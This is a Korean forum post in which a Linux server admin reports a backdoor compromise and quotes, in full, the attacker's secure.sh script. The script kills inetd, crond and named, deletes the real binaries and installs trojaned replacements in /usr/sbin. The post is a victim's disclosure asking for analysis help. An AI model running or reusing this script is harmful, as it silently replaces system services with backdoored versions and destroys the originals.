위의 화일중의 하나의 스크립트가 이렇게 되어있습니다.....
echo "killing ervicec.."
killall -9 inetd
killall -9 crond
killall -9 named
echo "removing old files.."
rm -rf /usr/sbin/named
rm -rf /usr/sbin/crond
rm -rf /usr/sbin/in.ftpd
rm -rf /var/named/ADMROCKS
echo "installing new files.."
mv named /usr/sbin/named
mv crond /usr/sbin/crond
mv in.ftpd /usr/sbin/in.ftpd
chmod +x /usr/sbin/named
chmod +x /usr/sbin/crond
chmod +x /usr/sbin/in.ftpd
echo "restarting services.."
/usr/sbin/inetd
/usr/sbin/crond
위의 스크립트는 위 화일을 바꿔치기 하는 스크립트가 아닌가여??????
ㅠ.ㅠ.ㅠ.ㅠ.ㅠ.ㅠ.ㅠ.ㅠ.ㅠ.ㅠ.ㅠ.ㅠ.ㅠ.ㅠ.
: 쩝 해킹의 소식이 이렇게 빠르다니..........
:
: 얼마전 백도어 해킹에 서버를 살펴보다보니..............
:
: 이상한 계정자가 생성 되어있구........... 그 계정 디렉토리에
:
: secure.tgz 화일과 login.tgz 화일이 있고
:
: secure.tgz 화일을 풀어보니.... crond 과 in.ftpd , named , 그리고
:
: secure.sh 화일이 있더군여..................
:
: login.tgz 화일은 풀어서 컴파일한 흔적이 있구여..........
:
: 제가 조금전에 링크를 걸어 놨더니 겁나게 많이들 가져 가시더라구여..
:
: 만약 해킹에 이용된 도구라면 또다시 이용될까봐 ..... 과감히 삭제하고
:
: 파일도 퍼미션을 바꿔 놨습니다.. 좀전가져가신 분들은 파악되시면...
:
: 저에게 메일 부탁드리구여........................ 글구 위의 파일에
:
: 대한 정보를 아시는 분이 있으시다면 말씀좀 부탁드립니다...........
:
: 또한 위 쏘스를 분석하실수 있으신 진정한 리눅서 께서는 저에게 멜 주시면
:
: 위의 쏘스를 보내 드리겠습니다.......